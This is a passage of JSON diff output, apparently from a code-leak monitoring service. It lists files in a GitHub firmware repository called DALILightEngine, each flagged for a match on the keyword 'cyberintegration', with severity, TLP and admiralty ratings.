"example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5ff597aa0bcf83af6a0065a87369db0d35a0aa9c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/StatusManager/StatusManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": 
"cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/StatusManager/StatusManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "0ae60813662b989e7be38ed11ad3b678d849a4f2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/StatusManager/StatusManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/StatusManager/StatusManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4a88bc25d04b611667615d9585c83f352c11a08b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/EepromHandler/EepromHandler.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 
455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/EepromHandler/EepromHandler.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "46263a0e8543c3175e88cfb952feef77958e53dc", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/EepromHandler/EepromHandler.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/EepromHandler/EepromHandler.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "bfb9458a904b3ea4678e5b4bab830cf7465b268f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + 
"data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f28470e0347408c6d0685216469977d28e53424c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c5135779e4588be9194eb3071df4995dbedf33c1", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c44d8ea280f030c7362c70017508cb85ccc06493", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/EepromHandler/EepromHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/EepromHandler/EepromHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "975e59dd47c018657eb4485ab657ead8b26aa7ca", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "3e94a9678391f553e474fa9b0eccb23cb90e8119", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9e6bf52a33c7a082acf383899af13d8f5ccef8ff", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": 
null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4c17b93006a28fbdd11c08f6414917f3ba6cd239", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03201ac767aec006a655436c3eafb23851ffd278", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": 
"example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "87be0468bcd0e9cd0d64fa437d9c81568d12e1f8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9b85a966fad22a4381a23c5969a32f7bee3b3d87", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + 
"cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1e32591e9ce43d29533952ee0ed4e6d86e7229cd", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f2ed48312c0ac906ef9bb88b709ba744a15dd534", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac_def.h" 
+ }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2594cfc267fb69cba8616f8495ed5cb9fca33a8b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2ec1a197969971fc073fe834a03844dac415ff60", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + 
"evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1a20c1e212e4e2020e86bc2979ead2969b57be26", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "89b65948485f8d1f576bef18f5a158eee70d45f1", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": 
"amber", + "ttl": 30 + }, + "id": "03563a4a63afa79c73f4d3c0eb90410b7135a5cb", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b942402e4a72a5ed96bc1c247886bf3431142f88", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ff1a9f0c737f8350268dd076797c54ab767f4f94", + "matchesType": [ + "keyword" + ], + 
"matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "db3aecb29f911dd5f594b2ab5f65b564905028a7", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "21df44f8a39983be5e00aa47044a9f5474f0e775", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": 
"cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "550cd0d1903f330f985d7793d857657c20ce3663", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Interrupt/Interrupt.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Interrupt/Interrupt.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "634285cb5efe4560e7e888d3d227839339fb43b3", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Interrupt/Interrupt.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + 
"type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Interrupt/Interrupt.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b4d7646beb83eccb0fc54e3d0c6724bc2eea548b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "12d7224e305ed4e044163aeb74437190cf407caf", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9052514163ce57fe81a87536084cfa683d05f725", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager_def.h" + }, + { + "dataFound": [], + "dateCreated": 